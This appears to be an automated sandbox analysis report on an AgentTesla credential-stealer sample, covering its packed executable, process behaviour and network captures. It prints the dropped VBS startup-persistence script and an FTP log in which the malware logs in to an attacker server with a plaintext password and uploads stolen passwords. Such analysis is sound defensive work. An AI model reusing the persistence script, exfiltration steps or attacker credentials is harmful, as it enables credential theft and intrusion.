                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...NJ{g.........."..............@..@....P... ....@.......................................@...@.......@.........................$.... ......................................................$.......D...............................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

                                    Download File
                                    Process:C:\Users\user\AppData\Local\enterogenous\cunila.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.3936647990218423
                                    Encrypted:false
                                    SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Alq6YL29MnriIM8lfQVn:DsO+vNlzQ1Alq6Y4KmA2n
                                    MD5:94B8CA892BC1D9A447940F0781FE3EC0
                                    SHA1:7296D5EBC61364F24D2BCC1F3CCC4BFBBC8C8309
                                    SHA-256:F7D0D7C2AC91DCF53FB086D7B1F3907A9F2DD8AE4ED2BE1DA21DCB487411D6C6
                                    SHA-512:3753174541B031A1C62D7FF189504A1234A688F9392BC3337BACCBE140A34076C40815415C9C4B193D375180DA12226DBB7A9D7FA6E4E6046AF22F90AF154E52
                                    Malicious:true
                                    Reputation:low
                                    Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.e.n.t.e.r.o.g.e.n.o.u.s.\.c.u.n.i.l.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.964461200331325
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.39%
                                    • UPX compressed Win32 Executable (30571/9) 0.30%
                                    • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    File name:SAL987656700.exe
                                    File size:892'416 bytes
                                    MD5:a885a9c7468691538b78d54852b5a59c
                                    SHA1:1b2340a366a6b28ac9d30f31bacef95afd0de595
                                    SHA256:d2d196a12c822020c4042d607be77746951b6cb3c16201ff21ca8e9c5c786209
                                    SHA512:903c918ef94c4dd9c8277c7cffe2774a26af285e1e41dcf71c5c3aee1fc65d1202a2eb227267bb044c050299acbfb67b970ca75e17f5da1fc48e89472f45173c
                                    SSDEEP:12288:9sHzOUNUSB/o5LsI1uwajJ5yvv1l2lclTUX1MDc35Qx3tkscoP80In35zFYoRn33:UiUmSB/o5d1ubcv620n356C0IpZnJGO
                                    TLSH:C715235B51C1DC6AE8122378847A8DE1D3F02931DBE57BBD8B44F65E3874393C10BA66
                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                    File Icon

                                    Icon Hash:aaf3e3e3938382a0

                                    Static PE Info

                                    General

                                    Entrypoint:0x561740
                                    Entrypoint Section:UPX1
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x677B4A4E [Mon Jan 6 03:13:18 2025 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:21371b611d91188d602926b15db6bd48

                                    Entrypoint Preview

                                    Instruction
                                    pushad
                                    mov esi, 00505000h
                                    lea edi, dword ptr [esi-00104000h]
                                    push edi
                                    jmp 00007F2F0D0F071Dh
                                    nop
                                    mov al, byte ptr [esi]
                                    inc esi
                                    mov byte ptr [edi], al
                                    inc edi
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F06FFh
                                    mov eax, 00000001h
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc eax, eax
                                    add ebx, ebx
                                    jnc 00007F2F0D0F071Dh
                                    jne 00007F2F0D0F073Ah
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F0731h
                                    dec eax
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc eax, eax
                                    jmp 00007F2F0D0F06E6h
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc ecx, ecx
                                    jmp 00007F2F0D0F0764h
                                    xor ecx, ecx
                                    sub eax, 03h
                                    jc 00007F2F0D0F0723h
                                    shl eax, 08h
                                    mov al, byte ptr [esi]
                                    inc esi
                                    xor eax, FFFFFFFFh
                                    je 00007F2F0D0F0787h
                                    sar eax, 1
                                    mov ebp, eax
                                    jmp 00007F2F0D0F071Dh
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F06DEh
                                    inc ecx
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F06D0h
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc ecx, ecx
                                    add ebx, ebx
                                    jnc 00007F2F0D0F0701h
                                    jne 00007F2F0D0F071Bh
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jnc 00007F2F0D0F06F6h
                                    add ecx, 02h
                                    cmp ebp, FFFFFB00h
                                    adc ecx, 02h
                                    lea edx, dword ptr [edi+ebp]
                                    cmp ebp, FFFFFFFCh
                                    jbe 00007F2F0D0F0720h
                                    mov al, byte ptr [edx]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1deb800x424.rsrc
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1620000x7cb80.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1defa40x14.rsrc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x1619240x18UPX1
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1619440xa0UPX1
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    UPX00x10000x1040000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    UPX10x1050000x5d0000x5ca00b8db83d0f28430b42b70d496db43c020False0.9885211074561403data7.937300160418177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1620000x7d0000x7d000c8ff72b376a435e7c3a215538c8f5abbFalse0.959794921875data7.9582034907557215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1625ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                    RT_ICON0x1626d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                    RT_ICON0x1628040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0x1629300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                    RT_ICON0x162c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                    RT_ICON0x162d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                    RT_ICON0x163bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                    RT_ICON0x1644a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                    RT_ICON0x164a0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                    RT_ICON0x166fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                    RT_ICON0x1680640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                    RT_MENU0xda4a00x50emptyEnglishGreat Britain0
                                    RT_STRING0xda4f00x594emptyEnglishGreat Britain0
                                    RT_STRING0xdaa840x68aemptyEnglishGreat Britain0
                                    RT_STRING0xdb1100x490emptyEnglishGreat Britain0
                                    RT_STRING0xdb5a00x5fcemptyEnglishGreat Britain0
                                    RT_STRING0xdbb9c0x65cemptyEnglishGreat Britain0
                                    RT_STRING0xdc1f80x466emptyEnglishGreat Britain0
                                    RT_STRING0xdc6600x158emptyEnglishGreat Britain0
                                    RT_RCDATA0x1684d00x76116data1.0003225766429698
                                    RT_GROUP_ICON0x1de5ec0x76dataEnglishGreat Britain0.6610169491525424
                                    RT_GROUP_ICON0x1de6680x14dataEnglishGreat Britain1.25
                                    RT_GROUP_ICON0x1de6800x14dataEnglishGreat Britain1.15
                                    RT_GROUP_ICON0x1de6980x14dataEnglishGreat Britain1.25
                                    RT_VERSION0x1de6b00xdcdataEnglishGreat Britain0.6181818181818182
                                    RT_MANIFEST0x1de7900x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                    Imports

                                    DLLImport
                                    KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                    ADVAPI32.dllGetAce
                                    COMCTL32.dllImageList_Remove
                                    COMDLG32.dllGetSaveFileNameW
                                    GDI32.dllLineTo
                                    IPHLPAPI.DLLIcmpSendEcho
                                    MPR.dllWNetGetConnectionW
                                    ole32.dllCoGetObject
                                    OLEAUT32.dllOleLoadPicture
                                    PSAPI.DLLGetProcessMemoryInfo
                                    SHELL32.dllDragFinish
                                    USER32.dllGetDC
                                    USERENV.dllLoadUserProfileW
                                    UxTheme.dllIsThemeActive
                                    VERSION.dllVerQueryValueW
                                    WININET.dllFtpOpenFileW
                                    WINMM.dlltimeGetTime
                                    WSOCK32.dllconnect

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-06T17:03:20.250590+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549711162.241.62.6321TCP
                                    2025-01-06T17:03:20.644800+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549714162.241.62.6332929TCP
                                    2025-01-06T17:03:20.650314+01001800009Joe Security MALWARE AgentTesla - FTP Exfil Passwords1192.168.2.549714162.241.62.6332929TCP
                                    2025-01-06T17:03:20.650314+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549714162.241.62.6332929TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 6, 2025 17:03:03.655004978 CET4970480192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:03.659878969 CET8049704208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:03:03.660012007 CET4970480192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:03.665081978 CET4970480192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:03.669848919 CET8049704208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:03:04.138696909 CET8049704208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:03:04.191821098 CET4970480192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:05.428960085 CET4970521192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:05.435220003 CET2149705162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:05.435307026 CET4970521192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:05.453782082 CET4970521192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:05.460098982 CET2149705162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:05.460158110 CET4970521192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:17.777456999 CET4970680192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:17.782428026 CET8049706208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:03:17.782536983 CET4970680192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:17.782908916 CET4970680192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:17.787655115 CET8049706208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:03:18.011972904 CET4970480192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:18.235019922 CET8049706208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:03:18.285631895 CET4970680192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:03:18.934787035 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:18.939685106 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:18.939774036 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:19.451276064 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.451558113 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:19.456341982 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.564841032 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.564965010 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:19.569715977 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.777668953 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.785460949 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:19.790240049 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.900284052 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:19.900434017 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:19.905267000 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.016629934 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.016763926 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.021723986 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.130750895 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.131010056 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.135799885 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.244719028 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.245507002 CET4971432929192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.250350952 CET3292949714162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.250432968 CET4971432929192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.250590086 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.255357027 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.644556046 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.644799948 CET4971432929192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.644874096 CET4971432929192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.649563074 CET3292949714162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.650262117 CET3292949714162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.650314093 CET4971432929192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.691873074 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:20.775264978 CET2149711162.241.62.63192.168.2.5
                                    Jan 6, 2025 17:03:20.816874027 CET4971121192.168.2.5162.241.62.63
                                    Jan 6, 2025 17:03:33.059834003 CET5337053192.168.2.5162.159.36.2
                                    Jan 6, 2025 17:03:33.064652920 CET5353370162.159.36.2192.168.2.5
                                    Jan 6, 2025 17:03:33.064737082 CET5337053192.168.2.5162.159.36.2
                                    Jan 6, 2025 17:03:33.069605112 CET5353370162.159.36.2192.168.2.5
                                    Jan 6, 2025 17:03:33.537436962 CET5337053192.168.2.5162.159.36.2
                                    Jan 6, 2025 17:03:33.542386055 CET5353370162.159.36.2192.168.2.5
                                    Jan 6, 2025 17:03:33.542454004 CET5337053192.168.2.5162.159.36.2
                                    Jan 6, 2025 17:04:08.942256927 CET4970680192.168.2.5208.95.112.1
                                    Jan 6, 2025 17:04:08.947470903 CET8049706208.95.112.1192.168.2.5
                                    Jan 6, 2025 17:04:08.947664022 CET4970680192.168.2.5208.95.112.1

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 6, 2025 17:03:03.638039112 CET5123153192.168.2.51.1.1.1
                                    Jan 6, 2025 17:03:03.645544052 CET53512311.1.1.1192.168.2.5
                                    Jan 6, 2025 17:03:05.108865976 CET6249253192.168.2.51.1.1.1
                                    Jan 6, 2025 17:03:05.427422047 CET53624921.1.1.1192.168.2.5
                                    Jan 6, 2025 17:03:33.059339046 CET5350888162.159.36.2192.168.2.5
                                    Jan 6, 2025 17:03:33.558921099 CET5894853192.168.2.51.1.1.1
                                    Jan 6, 2025 17:03:33.566123962 CET53589481.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 6, 2025 17:03:03.638039112 CET192.168.2.51.1.1.10x23aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                    Jan 6, 2025 17:03:05.108865976 CET192.168.2.51.1.1.10xd6d4Standard query (0)ftp.antoniomayol.comA (IP address)IN (0x0001)false
                                    Jan 6, 2025 17:03:33.558921099 CET192.168.2.51.1.1.10x89deStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 6, 2025 17:03:03.645544052 CET1.1.1.1192.168.2.50x23aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                    Jan 6, 2025 17:03:05.427422047 CET1.1.1.1192.168.2.50xd6d4No error (0)ftp.antoniomayol.comantoniomayol.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 6, 2025 17:03:05.427422047 CET1.1.1.1192.168.2.50xd6d4No error (0)antoniomayol.com162.241.62.63A (IP address)IN (0x0001)false
                                    Jan 6, 2025 17:03:33.566123962 CET1.1.1.1192.168.2.50x89deName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • ip-api.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549704208.95.112.1802316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 6, 2025 17:03:03.665081978 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Jan 6, 2025 17:03:04.138696909 CET175INHTTP/1.1 200 OK
                                    Date: Mon, 06 Jan 2025 16:03:03 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.549706208.95.112.1805376C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 6, 2025 17:03:17.782908916 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Jan 6, 2025 17:03:18.235019922 CET175INHTTP/1.1 200 OK
                                    Date: Mon, 06 Jan 2025 16:03:17 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 45
                                    X-Rl: 43
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false


                                    FTP Packets

                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Jan 6, 2025 17:03:19.451276064 CET2149711162.241.62.63192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.
                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 10:03. Server port: 21.
                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 10:03. Server port: 21.220-IPv6 connections are also welcome on this server.
                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 10:03. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                    Jan 6, 2025 17:03:19.451558113 CET4971121192.168.2.5162.241.62.63USER johnson@antoniomayol.com
                                    Jan 6, 2025 17:03:19.564841032 CET2149711162.241.62.63192.168.2.5331 User johnson@antoniomayol.com OK. Password required
                                    Jan 6, 2025 17:03:19.564965010 CET4971121192.168.2.5162.241.62.63PASS cMhKDQUk1{;%
                                    Jan 6, 2025 17:03:19.777668953 CET2149711162.241.62.63192.168.2.5230-OK. Current restricted directory is /
                                    230-OK. Current restricted directory is /230 8 Kbytes used (0%) - authorized: 2048000 Kb
                                    Jan 6, 2025 17:03:19.900284052 CET2149711162.241.62.63192.168.2.5504 Unknown command
                                    Jan 6, 2025 17:03:19.900434017 CET4971121192.168.2.5162.241.62.63PWD
                                    Jan 6, 2025 17:03:20.016629934 CET2149711162.241.62.63192.168.2.5257 "/" is your current location
                                    Jan 6, 2025 17:03:20.016763926 CET4971121192.168.2.5162.241.62.63TYPE I
                                    Jan 6, 2025 17:03:20.130750895 CET2149711162.241.62.63192.168.2.5200 TYPE is now 8-bit binary
                                    Jan 6, 2025 17:03:20.131010056 CET4971121192.168.2.5162.241.62.63PASV
                                    Jan 6, 2025 17:03:20.244719028 CET2149711162.241.62.63192.168.2.5227 Entering Passive Mode (162,241,62,63,128,161)
                                    Jan 6, 2025 17:03:20.250590086 CET4971121192.168.2.5162.241.62.63STOR PW_user-287400_2025_01_06_11_03_17.html
                                    Jan 6, 2025 17:03:20.644556046 CET2149711162.241.62.63192.168.2.5150 Accepted data connection
                                    Jan 6, 2025 17:03:20.775264978 CET2149711162.241.62.63192.168.2.5226-9 Kbytes used (0%) - authorized: 2048000 Kb
                                    226-9 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred
                                    226-9 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred226 0.115 seconds (measured here), 2.73 Kbytes per second

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:11:02:59
                                    Start date:06/01/2025
                                    Path:C:\Users\user\Desktop\SAL987656700.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SAL987656700.exe"
                                    Imagebase:0x880000
                                    File size:892'416 bytes
                                    MD5 hash:A885A9C7468691538B78D54852B5A59C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:11:03:00
                                    Start date:06/01/2025
                                    Path:C:\Users\user\AppData\Local\enterogenous\cunila.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SAL987656700.exe"
                                    Imagebase:0x520000
                                    File size:892'416 bytes
                                    MD5 hash:A885A9C7468691538B78D54852B5A59C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 45%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:11:03:01
                                    Start date:06/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SAL987656700.exe"
                                    Imagebase:0x2e0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:11:03:13
                                    Start date:06/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                                    Imagebase:0x7ff6fcb90000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
